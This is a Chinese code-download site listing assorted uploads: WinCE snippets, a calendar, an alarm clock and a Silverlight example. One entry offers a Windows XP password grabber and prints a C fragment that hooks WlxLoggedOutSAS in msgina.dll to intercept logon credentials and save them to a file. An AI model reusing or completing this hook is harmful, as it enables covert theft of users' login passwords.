-
VC图灵机示范程序
VC图灵机示范程序-VC Turing Machine model procedures
- 2022-08-14 02:27:37下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
wince程序自动运行的一段代码,可以参考一下
wince程序自动运行的一段代码,可以参考一下-wince automatic operation of a code can reference
- 2023-02-04 09:20:04下载
- 积分:1
-
i.MX27 OAL WINCE6.0
i.mx27 oal for wince6.0
- 2023-07-19 19:10:03下载
- 积分:1
-
how XP.Embedded system will be cut following the 200M, can support multimedia ap...
介绍如何将XP.Embedded系统裁减到200M以下的办法,可以支持多媒体应用,可是嵌入式开发者的利器哦-how XP.Embedded system will be cut following the 200M, can support multimedia applications, but developers of embedded weapon oh
- 2022-07-18 00:13:25下载
- 积分:1
-
一个课程设计的万年日历 按下指定的键操作,可以显示从1900年到以后的各月的日历...
一个课程设计的万年日历 按下指定的键操作,可以显示从1900年到以后的各月的日历-a curriculum design calendar years pressing specific keys operation can show from 1900 to a future on the calendar
- 2022-08-22 19:28:43下载
- 积分:1
-
一个用C做的闹钟源程序,声明:转载
一个用C做的闹钟源程序,声明:转载-do a C source of alarm, a statement : reproduced
- 2022-07-01 09:37:19下载
- 积分:1
-
一个材料力学课程的作业,用于惯性矩的计算,虽然比较小,但也是我平时学VB的积累。...
一个材料力学课程的作业,用于惯性矩的计算,虽然比较小,但也是我平时学VB的积累。-a mechanical operation of the courses, for the moment of inertia, although relatively small, but I always learn is the accumulation of VB.
- 2023-03-22 09:55:03下载
- 积分:1
-
很好的程序 很好的程序 很好的程序 很好的程序
很好的程序 很好的程序 很好的程序 很好的程序-henghaodechengxuhenghaodechengxuhenghaodechengxuhenghaodechengxuhenghaodechengxuhenghaodechengxuhenghaodechengxuhenghaodechengxu
- 2022-01-25 16:10:49下载
- 积分:1
-
例子如何在silverlight中使用后台数据
例子如何在silverlight中使用后台数据-Examples of how to use silverlight background data
- 2022-05-20 03:02:14下载
- 积分:1